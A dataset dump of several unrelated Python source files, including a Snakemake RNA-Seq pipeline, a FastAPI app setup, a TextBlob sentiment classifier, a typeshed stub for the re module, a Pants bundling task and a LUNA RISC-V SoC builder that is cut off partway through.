text
stringlengths 8
6.05M
|
|---|
class AbstractBackend:
NAME = None
SALT = None
@classmethod
def handle(cls):
raise NotImplementedError()
|
from snakemake.utils import R
import sys
"""
Author: D. Puthier
Affiliation: AMU
Aim: A simple Snakemake workflow to process paired-end stranded RNA-Seq.
Date: Mon Nov 2 14:03:11 CET 2015
Run: snakemake -s Snakefile
Latest modification:
- todo
"""
##-----------------------------------------------##
## A set of functions
##-----------------------------------------------##
def message(mes):
sys.stderr.write("|--- " + mes + "\n")
##-----------------------------------------------##
## Working directory ##
## Adapt to your needs ##
##-----------------------------------------------##
BASE_DIR="/home/liyubing/analysis/7_snakemake/projects/"
WDIR = BASE_DIR + "t-cell_analysis"
workdir: WDIR
message("The current working directory is " + WDIR)
##--------------------------------------------------------------------------------------##
## Variables declaration
## Declaring some variables used by topHat and other tools...
## (GTF file, INDEX, chromosome length)
##--------------------------------------------------------------------------------------##
# Adapt the path to your needs
INDEX = BASE_DIR + "indexes/bowtie2/mm10/chr19"
GTF = BASE_DIR + "annotations/gtf/GRCm38.83.chr19.gtf"
CHR = BASE_DIR + "annotations/txt/chromInfo_mm10.txt"
FASTA = BASE_DIR + "indexes/bowtie2/mm10/chr19.fa"
##--------------------------------------------------------------------------------------##
## The list of samples to be processed
##--------------------------------------------------------------------------------------##
SAMPLES, = glob_wildcards("samples/raw/{smp}_R1.fq.gz")
NB_SAMPLES = len(SAMPLES)
for smp in SAMPLES:
message("Sample " + smp + " will be processed")
rule final:
input:
expand("samples/fastqc/{smp}/{smp}_R1_t_fastqc.zip", smp=SAMPLES),
"samples/cuffmerge/merged.gtf","results/diagnostic_plot/diagnostic.pdf"
rule trimming:
input: fwd="samples/raw/{smp}_R1.fq.gz", rev="samples/raw/{smp}_R2.fq.gz"
output: fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq",
single="samples/trimmed/{smp}_R1_singletons.fq"
message: """--- Trimming."""
shell: """
sickle pe -f {input.fwd} -r {input.rev} -l 25 -q 20 -t sanger -o {output.fwd} -p {output.rev} -s {output.single} &> {input.fwd}.log
"""
rule fastqc:
input: fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq"
output: fwd="samples/fastqc/{smp}/{smp}_R1_t_fastqc.zip",rev="samples/fastqc/{smp}/{smp}_R2_t_fastqc.zip"
message: """--- Quality check of raw data with Fastqc."""
shell: """
fastqc --outdir samples/fastqc/{wildcards.smp} --extract -f fastq {input.fwd} {input.rev}
"""
rule tophat:
input:fwd="samples/trimmed/{smp}_R1_t.fq",
rev="samples/trimmed/{smp}_R2_t.fq"
params: gtf=GTF, index=INDEX
output: "samples/bam/{smp}.bam"
shell: """
source activate base;set -euo pipefail;
mkdir -p samples/tophat/{wildcards.smp}
tophat2 -o samples/tophat/{wildcards.smp} -g 1 --library-type fr-firststrand -G {params.gtf} -x 1 -p 5 {params.index} {input.fwd} {input.rev} &> samples/tophat/{wildcards.smp}/run_tophat.log
cd samples/tophat/{wildcards.smp}
mv accepted_hits.bam ../../bam/{wildcards.smp}.bam
"""
rule cufflinks:
input: bam="samples/bam/{smp}.bam"
output: gtf="samples/cufflinks/{smp}/transcripts.gtf"
params: gtf=GTF
message: "--- Searching novel transcript with cufflinks."
shell: """
cufflinks -g {params.gtf} -p 5 --library-type fr-firststrand -o samples/cufflinks/{wildcards.smp} {input.bam} &> {output}.log
"""
rule cuffmerge:
input: expand("samplies/cufflinks/{smp}/transcripts.gtf", smp=SAMPLES)
output: "samples/cuffmerge/merged.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Comparing transcript to the reference."
shell: """
ls -1 samples/cufflinks/*/transcripts.gtf > samples/cuffmerge/assembly.txt
source activate base;set -euo pipefail;
cuffmerge -o samples/cuffmerge -g {params.gtf} --keep-tmp -s {params.fa} -p 5 samples/cuffmerge/assembly.txt &> {output}.log
"""
rule add_gene_name_to_unknown:
input: "samples/cuffmerge/novel_transcript.gtf"
output: "samples/cuffmerge/novel_transcript_gn.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Adding gene name to novel transcript."
run:
import re
fh_in = open(input[0], "r")
fh_out = open(output[0], "w")
for line in fh_in:
line = dline.rstrip("\n")
if not re.search("gene_name", line):
gene_id = re.match('.*gene_id "(.*?)"', line).group(1)
fh_out.write(line + ' gene_name "' + gene_id + '";\n')
rule merge_novel_and_known:
input: novel="samples/cuffmerge/novel_transcript_gn.gtf", known=GTF
output: "samples/new_annotation/all_transcripts.gtf"
params: gtf=GTF, fa=FASTA
message: "--- Merging known and novel transcripts."
shell: """
cat {input.novel} {input.known} > {output}
"""
rule quantification_with_featureCounts:
input: novel="samples/new_annotation/all_transcripts.gtf", bam=expand("samples/bam/{smp}.bam", smp=SAMPLES)
output: "results/counts/gene_counts.txt", "results/counts/gene_counts_mini.txt"
shell: """
featureCounts -p -s 2 -T 15 -t exon -g gene_id -a {input.novel} -o {output[0]} {input.bam} &> {output[0]}.log
cut -f 1,7- {output[0]}| awk 'NR > 1' | awk '{{gsub("samples/bam/","",$0); print}}' > {output[1]}
"""
rule diagnostic_plot:
input: "results/counts/gene_counts_mini.txt"
output: "results/diagnostic_plot/diagnostic.pdf"
run:
R("""
system("source activate base;set -euo pipefail;")
dir.create("results/diagnostic_plot")
data <- read.table("{input}",
sep="\t",
header=T,
row.names=1)
data <- data[rowSums(data) > 0, ]
data <- log2(data + 1)
pdf("{output}")
dev.null <- apply(data, 2, hist, border="white", col="blue")
boxplot(data, color="blue", pch=16)
pairs(data, pch=".", col="blue")
dev.off()
cat("etc...")
""")
|
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from .db import models
from .db.database import engine
from .routers import job, employee
models.Base.metadata.create_all(bind=engine)
app = FastAPI()
origins = [
"http://localhost",
"http://localhost:3000",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(job.router)
app.include_router(employee.router)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from textblob.classifiers import NaiveBayesClassifier
import pickle
import os.path
import hashlib
from textblob import TextBlob
import json
DEBUG=True
trained_classifier = 'nb.classifier'
def loadSet(path, polarity):
sentences = []
with open(path) as f:
for line in f:
sentences.append((line, polarity))
return sentences
def storeClassifier(object):
file = open(trained_classifier ,'wb')
pickle.dump(object,file)
def loadClassifier():
with open(trained_classifier, 'rb') as handle:
return pickle.load(handle)
test = [
('Ohne Köttbullar seid ihr nichts!', 'neg'),
('Bitte um Erklärung !!!', 'neg'),
('ich bin enttäuscht', 'neg'),
('IKEA ich liebe dich :D ♥', 'pos'),
('Ein tolles blau gelbes Bild...', 'pos'),
('Besser als im Kino hier :D', 'pos')
]
train = loadSet('negativ.txt', 'neg') + loadSet('positiv.txt', 'pos')
if os.path.isfile(trained_classifier) and not DEBUG:
nb_cl = loadClassifier()
else:
nb_cl = NaiveBayesClassifier() #train
storeClassifier(nb_cl)
print(nb_cl.accuracy(test))
nb_cl.show_informative_features(30)
for i in test:
blob = TextBlob(i[0], classifier=nb_cl)
print(i)
print(blob.classify())
#test_sentence = "ich mag sie wirklich über alles"
#print ("NaiveBayes: %d,%d" % (nb_cl.prob_classify(test_sentence).prob("positive"),nb_cl.accuracy(test)) )
|
import enum
import sre_compile
import sys
from _typeshed import ReadableBuffer
from collections.abc import Callable, Iterator
from sre_constants import error as error
from typing import Any, AnyStr, Match as Match, Pattern as Pattern, overload
from typing_extensions import TypeAlias
__all__ = [
"match",
"fullmatch",
"search",
"sub",
"subn",
"split",
"findall",
"finditer",
"compile",
"purge",
"template",
"escape",
"error",
"A",
"I",
"L",
"M",
"S",
"X",
"U",
"ASCII",
"IGNORECASE",
"LOCALE",
"MULTILINE",
"DOTALL",
"VERBOSE",
"UNICODE",
"Match",
"Pattern",
]
if sys.version_info >= (3, 11):
__all__ += ["NOFLAG", "RegexFlag"]
# ----- re variables and constants -----
class RegexFlag(enum.IntFlag):
A = sre_compile.SRE_FLAG_ASCII
ASCII = A
DEBUG = sre_compile.SRE_FLAG_DEBUG
I = sre_compile.SRE_FLAG_IGNORECASE
IGNORECASE = I
L = sre_compile.SRE_FLAG_LOCALE
LOCALE = L
M = sre_compile.SRE_FLAG_MULTILINE
MULTILINE = M
S = sre_compile.SRE_FLAG_DOTALL
DOTALL = S
X = sre_compile.SRE_FLAG_VERBOSE
VERBOSE = X
U = sre_compile.SRE_FLAG_UNICODE
UNICODE = U
T = sre_compile.SRE_FLAG_TEMPLATE
TEMPLATE = T
if sys.version_info >= (3, 11):
NOFLAG: int
A = RegexFlag.A
ASCII = RegexFlag.ASCII
DEBUG = RegexFlag.DEBUG
I = RegexFlag.I
IGNORECASE = RegexFlag.IGNORECASE
L = RegexFlag.L
LOCALE = RegexFlag.LOCALE
M = RegexFlag.M
MULTILINE = RegexFlag.MULTILINE
S = RegexFlag.S
DOTALL = RegexFlag.DOTALL
X = RegexFlag.X
VERBOSE = RegexFlag.VERBOSE
U = RegexFlag.U
UNICODE = RegexFlag.UNICODE
T = RegexFlag.T
TEMPLATE = RegexFlag.TEMPLATE
if sys.version_info >= (3, 11):
NOFLAG = RegexFlag.NOFLAG
_FlagsType: TypeAlias = int | RegexFlag
# Type-wise the compile() overloads are unnecessary, they could also be modeled using
# unions in the parameter types. However mypy has a bug regarding TypeVar
# constraints (https://github.com/python/mypy/issues/11880),
# which limits us here because AnyStr is a constrained TypeVar.
# pattern arguments do *not* accept arbitrary buffers such as bytearray,
# because the pattern must be hashable.
@overload
def compile(pattern: AnyStr, flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
@overload
def compile(pattern: Pattern[AnyStr], flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
@overload
def search(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def search(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def match(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def match(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def fullmatch(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Match[str] | None: ...
@overload
def fullmatch(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Match[bytes] | None: ...
@overload
def split(pattern: str | Pattern[str], string: str, maxsplit: int = ..., flags: _FlagsType = ...) -> list[str | Any]: ...
@overload
def split(
pattern: bytes | Pattern[bytes], string: ReadableBuffer, maxsplit: int = ..., flags: _FlagsType = ...
) -> list[bytes | Any]: ...
@overload
def findall(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> list[Any]: ...
@overload
def findall(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> list[Any]: ...
@overload
def finditer(pattern: str | Pattern[str], string: str, flags: _FlagsType = ...) -> Iterator[Match[str]]: ...
@overload
def finditer(pattern: bytes | Pattern[bytes], string: ReadableBuffer, flags: _FlagsType = ...) -> Iterator[Match[bytes]]: ...
@overload
def sub(
pattern: str | Pattern[str], repl: str | Callable[[Match[str]], str], string: str, count: int = ..., flags: _FlagsType = ...
) -> str: ...
@overload
def sub(
pattern: bytes | Pattern[bytes],
repl: ReadableBuffer | Callable[[Match[bytes]], ReadableBuffer],
string: ReadableBuffer,
count: int = ...,
flags: _FlagsType = ...,
) -> bytes: ...
@overload
def subn(
pattern: str | Pattern[str], repl: str | Callable[[Match[str]], str], string: str, count: int = ..., flags: _FlagsType = ...
) -> tuple[str, int]: ...
@overload
def subn(
pattern: bytes | Pattern[bytes],
repl: ReadableBuffer | Callable[[Match[bytes]], ReadableBuffer],
string: ReadableBuffer,
count: int = ...,
flags: _FlagsType = ...,
) -> tuple[bytes, int]: ...
def escape(pattern: AnyStr) -> AnyStr: ...
def purge() -> None: ...
def template(pattern: AnyStr | Pattern[AnyStr], flags: _FlagsType = ...) -> Pattern[AnyStr]: ...
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from twitter.common.collections import OrderedSet
from pants.backend.jvm.targets.jvm_app import JvmApp
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.jvm_binary_task import JvmBinaryTask
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.build_graph.target_scopes import Scopes
from pants.fs import archive
from pants.util.dirutil import safe_mkdir
class BundleCreate(JvmBinaryTask):
"""
:API: public
"""
# Directory for both internal and external libraries.
LIBS_DIR = 'libs'
_target_closure_kwargs = dict(include_scopes=Scopes.JVM_RUNTIME_SCOPES, respect_intransitive=True)
@classmethod
def register_options(cls, register):
super(BundleCreate, cls).register_options(register)
register('--deployjar', type=bool,
fingerprint=True,
help="Pack all 3rdparty and internal jar classfiles into a single deployjar in "
"the bundle's root dir. If unset, all jars will go into the bundle's libs "
"directory, the root will only contain a synthetic jar with its manifest's "
"Class-Path set to those jars.")
register('--archive', choices=list(archive.TYPE_NAMES),
fingerprint=True,
help='Create an archive of this type from the bundle.')
register('--archive-prefix', type=bool,
fingerprint=True,
help='If --archive is specified, prefix archive with target basename or a unique '
'identifier as determined by --use-basename-prefix.')
# `target.id` ensures global uniqueness, this flag is provided primarily for
# backward compatibility.
register('--use-basename-prefix', type=bool,
help='Use target basename to prefix bundle folder or archive; otherwise a unique '
'identifier derived from target will be used.')
@classmethod
def product_types(cls):
return ['jvm_bundles']
class App(object):
"""A uniform interface to an app."""
@staticmethod
def is_app(target):
return isinstance(target, (JvmApp, JvmBinary))
def __init__(self, target, use_basename_prefix=False):
assert self.is_app(target), '{} is not a valid app target'.format(target)
self.address = target.address
self.binary = target if isinstance(target, JvmBinary) else target.binary
self.bundles = [] if isinstance(target, JvmBinary) else target.payload.bundles
self.basename = target.basename if use_basename_prefix else target.id
self.target = target
@property
def cache_target_dirs(self):
return True
def execute(self):
archiver_type = self.get_options().archive
archiver = archive.archiver(archiver_type) if archiver_type else None
if self.get_options().use_basename_prefix:
# NB(peiyu) This special casing is confusing especially given we already fail
# when duplicate basenames are detected. It's added because of the existing
# user experience. Turns out a `jvm_app` that depends on another `jvm_binary`
# of the same basename is fairly common. In this case, using just
# `target_roots` instead of all transitive targets will reduce the chance users
# see their bundle command fail due to basename conflicts. We should eventually
# get rid of this special case.
targets_to_bundle = self.context.target_roots
else:
targets_to_bundle = self.context.targets()
apps = [self.App(target, use_basename_prefix=self.get_options().use_basename_prefix)
for target in targets_to_bundle if self.App.is_app(target)]
if self.get_options().use_basename_prefix:
self.check_basename_conflicts(apps)
# NB(peiyu): performance hack to convert loose directories in classpath into jars. This is
# more efficient than loading them as individual files.
runtime_classpath = self.context.products.get_data('runtime_classpath')
targets_to_consolidate = self.find_consolidate_classpath_candidates(
runtime_classpath,
self.context.targets(**self._target_closure_kwargs),
)
self.consolidate_classpath(targets_to_consolidate, runtime_classpath)
for app in apps:
basedir = self.bundle(app)
# NB(Eric Ayers): Note that this product is not housed/controlled under .pants.d/ Since
# the bundle is re-created every time, this shouldn't cause a problem, but if we ever
# expect the product to be cached, a user running an 'rm' on the dist/ directory could
# cause inconsistencies.
jvm_bundles_product = self.context.products.get('jvm_bundles')
jvm_bundles_product.add(app.target, os.path.dirname(basedir)).append(os.path.basename(basedir))
if archiver:
archivepath = archiver.create(
basedir,
self.get_options().pants_distdir,
app.basename,
prefix=app.basename if self.get_options().archive_prefix else None
)
self.context.log.info('created {}'.format(os.path.relpath(archivepath, get_buildroot())))
class BasenameConflictError(TaskError):
"""Indicates the same basename is used by two targets."""
def bundle(self, app):
"""Create a self-contained application bundle.
The bundle will contain the target classes, dependencies and resources.
"""
assert(isinstance(app, BundleCreate.App))
bundle_dir = os.path.join(self.get_options().pants_distdir, '{}-bundle'.format(app.basename))
self.context.log.info('creating {}'.format(os.path.relpath(bundle_dir, get_buildroot())))
safe_mkdir(bundle_dir, clean=True)
classpath = OrderedSet()
# Create symlinks for both internal and external dependencies under `lib_dir`. This is
# only needed when not creating a deployjar
lib_dir = os.path.join(bundle_dir, self.LIBS_DIR)
if not self.get_options().deployjar:
os.mkdir(lib_dir)
runtime_classpath = self.context.products.get_data('runtime_classpath')
classpath.update(ClasspathUtil.create_canonical_classpath(
runtime_classpath,
app.target.closure(bfs=True, **self._target_closure_kwargs),
lib_dir,
internal_classpath_only=False,
excludes=app.binary.deploy_excludes,
))
bundle_jar = os.path.join(bundle_dir, '{}.jar'.format(app.binary.basename))
with self.monolithic_jar(app.binary, bundle_jar,
manifest_classpath=classpath) as jar:
self.add_main_manifest_entry(jar, app.binary)
# Make classpath complete by adding the monolithic jar.
classpath.update([jar.path])
if app.binary.shading_rules:
for jar_path in classpath:
# In case `jar_path` is a symlink, this is still safe, shaded jar will overwrite jar_path,
# original file `jar_path` linked to remains untouched.
# TODO run in parallel to speed up
self.shade_jar(shading_rules=app.binary.shading_rules, jar_path=jar_path)
for bundle in app.bundles:
for path, relpath in bundle.filemap.items():
bundle_path = os.path.join(bundle_dir, relpath)
if not os.path.exists(path):
raise TaskError('Given path: {} does not exist in target {}'.format(
path, app.address.spec))
safe_mkdir(os.path.dirname(bundle_path))
os.symlink(path, bundle_path)
return bundle_dir
def consolidate_classpath(self, targets, classpath_products):
"""Convert loose directories in classpath_products into jars. """
with self.invalidated(targets=targets, invalidate_dependents=True) as invalidation:
for vt in invalidation.all_vts:
entries = classpath_products.get_internal_classpath_entries_for_targets([vt.target])
for index, (conf, entry) in enumerate(entries):
if ClasspathUtil.is_dir(entry.path):
jarpath = os.path.join(vt.results_dir, 'output-{}.jar'.format(index))
# regenerate artifact for invalid vts
if not vt.valid:
with self.open_jar(jarpath, overwrite=True, compressed=False) as jar:
jar.write(entry.path)
# replace directory classpath entry with its jarpath
classpath_products.remove_for_target(vt.target, [(conf, entry.path)])
classpath_products.add_for_target(vt.target, [(conf, jarpath)])
def find_consolidate_classpath_candidates(self, classpath_products, targets):
targets_with_directory_in_classpath = []
for target in targets:
entries = classpath_products.get_internal_classpath_entries_for_targets([target])
for conf, entry in entries:
if ClasspathUtil.is_dir(entry.path):
targets_with_directory_in_classpath.append(target)
break
return targets_with_directory_in_classpath
def check_basename_conflicts(self, apps):
"""Apps' basenames are used as bundle directory names. Ensure they are all unique."""
basename_seen = {}
for app in apps:
if app.basename in basename_seen:
raise self.BasenameConflictError('Basename must be unique, found two targets use '
"the same basename: {}'\n\t{} and \n\t{}"
.format(app.basename,
basename_seen[app.basename].address.spec,
app.target.address.spec))
basename_seen[app.basename] = app.target
|
x,y=15,45
res=x if x<y esle y
print(res)
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Simple SoC abstraction for LUNA examples."""
import os
import datetime
import logging
from amaranth import Elaboratable, Module
from amaranth_soc import wishbone
from amaranth_stdio.serial import AsyncSerial
from lambdasoc.soc.cpu import CPUSoC
from lambdasoc.cpu.minerva import MinervaCPU
from lambdasoc.periph.intc import GenericInterruptController
from lambdasoc.periph.serial import AsyncSerialPeripheral
from lambdasoc.periph.sram import SRAMPeripheral
from lambdasoc.periph.timer import TimerPeripheral
from .memory import WishboneRAM, WishboneROM
from ..utils.cdc import synchronize
class SimpleSoC(CPUSoC, Elaboratable):
""" Class used for building simple, example system-on-a-chip architectures.
Intended to facilitate demonstrations (and very simple USB devices) by providing
a wrapper that can be updated as the Amaranth-based-SoC landscape changes. Hopefully,
this will eventually be filled by e.g. Amaranth-compatible-LiteX. :)
SimpleSoC devices intergrate:
- A simple riscv32i processor.
- One or more read-only or read-write memories.
- A number of amaranth-soc peripherals.
The current implementation uses a single, 32-bit wide Wishbone bus
as the system's backend; and uses lambdasoc as its backing technology.
This is subject to change.
"""
BUS_ADDRESS_WIDTH = 30
def __init__(self, clock_frequency=int(60e6)):
"""
Parameters:
clock_frequency -- The frequency of our `sync` domain, in MHz.
"""
self.sync_clk_freq = clock_frequency
self._main_rom = None
self._main_ram = None
self._uart_baud = None
# Keep track of our created peripherals and interrupts.
self._submodules = []
self._irqs = {}
self._next_irq_index = 0
# By default, don't attach any debug hardware; or build a BIOS.
self._auto_debug = False
self._build_bios = False
#
# Create our core hardware.
# We'll create this hardware early, so it can be used for e.g. code generation without
# fully elaborating our design.
#
# Create our CPU.
self.cpu = MinervaCPU(with_debug=False)
# Create our interrupt controller.
self.intc = GenericInterruptController(width=32)
# Create our bus decoder
self.bus_decoder = wishbone.Decoder(addr_width=30, data_width=32, granularity=8, features={"cti", "bte"})
# Things we don't have but lambdasoc's jinja2 templates expect
self.sdram = None
self.ethmac = None
@property
def memory_map(self):
return self.bus_decoder.bus.memory_map
def add_rom(self, data, size, addr=0, is_main_rom=True):
""" Creates a simple ROM and adds it to the design.
Parameters:
data -- The data to fill the relevant ROM.
size -- The size for the rom that should be created.
addr -- The address at which the ROM should reside.
"""
# Figure out how many address bits we'll need to address the given memory size.
addr_width = (size - 1).bit_length()
rom = WishboneROM(data, addr_width=addr_width)
if self._main_rom is None and is_main_rom:
self._main_rom = rom
return self.add_peripheral(rom, addr=addr)
@property
def mainram(self):
return self.sram
@property
def sram(self):
return self._main_ram
def add_ram(self, size: int, addr: int = None, is_main_mem: bool = True):
""" Creates a simple RAM and adds it to our design.
Parameters:
size -- The size of the RAM, in bytes. Will be rounded up to the nearest power of two.
addr -- The address at which to place the RAM.
"""
# Figure out how many address bits we'll need to address the given memory size.
addr_width = (size - 1).bit_length()
# ... and add it as a peripheral.
ram = WishboneRAM(addr_width=addr_width)
if self._main_ram is None and is_main_mem:
self._main_ram = ram
return self.add_peripheral(ram, addr=addr)
def add_peripheral(self, p, *, as_submodule=True, **kwargs):
""" Adds a peripheral to the SoC.
For now, this is identical to adding a peripheral to the SoC's wishbone bus.
For convenience, returns the peripheral provided.
"""
# Add the peripheral to our bus...
interface = getattr(p, 'bus')
self.bus_decoder.add(interface, **kwargs)
# ... add its IRQs to the IRQ controller...
try:
irq_line = getattr(p, 'irq')
self.intc.add_irq(irq_line, self._next_irq_index)
self._irqs[self._next_irq_index] = p
self._next_irq_index += 1
except (AttributeError, NotImplementedError):
# If the object has no associated IRQs, continue anyway.
# This allows us to add devices with only Wishbone interfaces to our SoC.
pass
# ... and keep track of it for later.
if as_submodule:
self._submodules.append(p)
return p
def add_debug_port(self):
""" Adds an automatically-connected Debug port to our SoC. """
self._auto_debug = True
def add_bios_and_peripherals(self, uart_pins, uart_baud_rate=115200, fixed_addresses=False):
""" Adds a simple BIOS that allows loading firmware, and the requisite peripherals.
Automatically adds the following peripherals:
self.uart -- An AsyncSerialPeripheral used for serial I/O.
self.timer -- A TimerPeripheral used for BIOS timing.
self.bootrom -- A ROM memory used for the BIOS.
self.scratchpad -- The RAM used by the BIOS; not typically the program RAM.
Parameters:
uart_pins -- The UARTResource to be used for UART communications; or an equivalent record.
uart_baud_rate -- The baud rate to be used by the BIOS' uart.
"""
self._build_bios = True
self._uart_baud = uart_baud_rate
# Add our RAM and ROM.
# Note that these names are from CPUSoC, and thus must not be changed.
#
# Here, we're using SRAMPeripherals instead of our more flexible ones,
# as that's what the lambdasoc BIOS expects. These are effectively internal.
#
addr = 0x0000_0000 if fixed_addresses else None
self.bootrom = SRAMPeripheral(size=0x4000, writable=False)
self.add_peripheral(self.bootrom, addr=addr)
addr = 0x0001_0000 if fixed_addresses else None
self.scratchpad = SRAMPeripheral(size=0x1000)
self.add_peripheral(self.scratchpad, addr=addr)
# Add our UART and Timer.
# Again, names are fixed.
addr = 0x0002_0000 if fixed_addresses else None
self.timer = TimerPeripheral(width=32)
self.add_peripheral(self.timer, addr=addr)
addr = 0x0003_0000 if fixed_addresses else None
uart_core = AsyncSerial(
data_bits = 8,
divisor = int(self.sync_clk_freq // uart_baud_rate),
pins = uart_pins,
)
self.uart = AsyncSerialPeripheral(core=uart_core)
self.add_peripheral(self.uart, addr=addr)
def elaborate(self, platform):
m = Module()
# Add our core CPU, and create its main system bus.
# Note that our default implementation uses a single bus for code and data,
# so this is both the instruction bus (ibus) and data bus (dbus).
m.submodules.cpu = self.cpu
m.submodules.bus = self.bus_decoder
# Create a basic programmable interrupt controller for our CPU.
m.submodules.pic = self.intc
# Add each of our peripherals to the bus.
for peripheral in self._submodules:
m.submodules += peripheral
# Merge the CPU's data and instruction busses. This essentially means taking the two
# separate bus masters (the CPU ibus master and the CPU dbus master), and connecting them
# to an arbiter, so they both share use of the single bus.
# Create the arbiter around our main bus...
m.submodules.bus_arbiter = arbiter = wishbone.Arbiter(addr_width=30, data_width=32, granularity=8, features={"cti", "bte"})
m.d.comb += arbiter.bus.connect(self.bus_decoder.bus)
# ... and connect it to the CPU instruction and data busses.
arbiter.add(self.cpu.ibus)
arbiter.add(self.cpu.dbus)
# Connect up our CPU interrupt lines.
m.d.comb += self.cpu.ip.eq(self.intc.ip)
# If we're automatically creating a debug connection, do so.
if self._auto_debug:
m.d.comb += [
self.cpu._cpu.jtag.tck .eq(synchronize(m, platform.request("user_io", 0, dir="i").i)),
self.cpu._cpu.jtag.tms .eq(synchronize(m, platform.request("user_io", 1, dir="i").i)),
self.cpu._cpu.jtag.tdi .eq(synchronize(m, platform.request("user_io", 2, dir="i").i)),
platform.request("user_io", 3, dir="o").o .eq(self.cpu._cpu.jtag.tdo)
]
return m
def resources(self, omit_bios_mem=True):
""" Creates an iterator over each of the device's addressable resources.
Yields (resource, address, size) for each resource.
Parameters:
omit_bios_mem -- If True, BIOS-related memories are skipped when generating our
resource listings. This hides BIOS resources from the application.
"""
# Grab the memory map for this SoC...
memory_map = self.bus_decoder.bus.memory_map
# ... find each addressable peripheral...
window: amaranth_soc.memory.MemoryMap
for window, (window_start, _end, _granularity) in memory_map.windows():
resources = window.all_resources()
# ... find the peripheral's resources...
resource_info: amaranth_soc.memory.ResourceInfo
for resource_info in resources:
resource = resource_info.resource
register_offset = resource_info.start
register_end_offset = resource_info.end
_local_granularity = resource_info.width
if self._build_bios and omit_bios_mem:
# If we're omitting bios resources, skip the BIOS ram/rom.
if (self.scratchpad._mem is resource) or (self.bootrom._mem is resource):
continue
# ... and extract the peripheral's range/vitals...
size = register_end_offset - register_offset
yield window, resource, window_start + register_offset, size
def build(self, name=None, build_dir="build"):
""" Builds any internal artifacts necessary to create our CPU.
This is usually used for e.g. building our BIOS.
Parmeters:
name -- The name for the SoC design.
build_dir -- The directory where our main Amaranth build is being performed.
We'll build in a subdirectory of it.
"""
# If we're building a BIOS, let our superclass build a BIOS for us.
if self._build_bios:
logging.info("Building SoC BIOS...")
super().build(name=name, build_dir=os.path.join(build_dir, 'soc'), do_build=True, do_init=True)
logging.info("BIOS build complete. Continuing with SoC build.")
self.log_resources()
def _range_for_peripheral(self, target_peripheral):
""" Returns size information for the given peripheral.
Returns:
addr, size -- if the given size is known; or
None, None if not
"""
# Grab the memory map for this SoC...
memory_map = self.bus_decoder.bus.memory_map
# Search our memory map for the target peripheral.
resource_info: amaranth_soc.memory.ResourceInfo
for resource_info in memory_map.all_resources():
if resource_info.name[0] is target_peripheral.name:
return resource_info.start, (resource_info.end - resource_info.start)
return None, None
def _emit_minerva_basics(self, emit):
""" Emits the standard Minerva RISC-V CSR functionality.
Parameters
----------
emit: callable(str)
The function used to print the code lines to the output stream.
"""
emit("#ifndef read_csr")
emit("#define read_csr(reg) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrr %0, \" #reg : \"=r\"(__tmp)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef write_csr")
emit("#define write_csr(reg, val) ({ \\")
emit(" asm volatile (\"csrw \" #reg \", %0\" :: \"rK\"(val)); })")
emit("#endif")
emit("")
emit("#ifndef set_csr")
emit("#define set_csr(reg, bit) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrrs %0, \" #reg \", %1\" : \"=r\"(__tmp) : \"rK\"(bit)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef clear_csr")
emit("#define clear_csr(reg, bit) ({ unsigned long __tmp; \\")
emit(" asm volatile (\"csrrc %0, \" #reg \", %1\" : \"=r\"(__tmp) : \"rK\"(bit)); \\")
emit(" __tmp; })")
emit("#endif")
emit("")
emit("#ifndef MSTATUS_MIE")
emit("#define MSTATUS_MIE 0x00000008")
emit("#endif")
emit("")
emit("//")
emit("// Minerva headers")
emit("//")
emit("")
emit("static inline uint32_t irq_getie(void)")
emit("{")
emit(" return (read_csr(mstatus) & MSTATUS_MIE) != 0;")
emit("}")
emit("")
emit("static inline void irq_setie(uint32_t ie)")
emit("{")
emit(" if (ie) {")
emit(" set_csr(mstatus, MSTATUS_MIE);")
emit(" } else {")
emit(" clear_csr(mstatus, MSTATUS_MIE);")
emit(" }")
emit("}")
emit("")
emit("static inline uint32_t irq_getmask(void)")
emit("{")
emit(" return read_csr(0x330);")
emit("}")
emit("")
emit("static inline void irq_setmask(uint32_t value)")
emit("{")
emit(" write_csr(0x330, value);")
emit("}")
emit("")
emit("static inline uint32_t pending_irqs(void)")
emit("{")
emit(" return read_csr(0x360);")
emit("}")
emit("")
def generate_c_header(self, macro_name="SOC_RESOURCES", file=None, platform_name="Generic Platform"):
""" Generates a C header file that simplifies access to the platform's resources.
Parameters:
macro_name -- Optional. The name of the guard macro for the C header, as a string without spaces.
file -- Optional. If provided, this will be treated as the file= argument to the print()
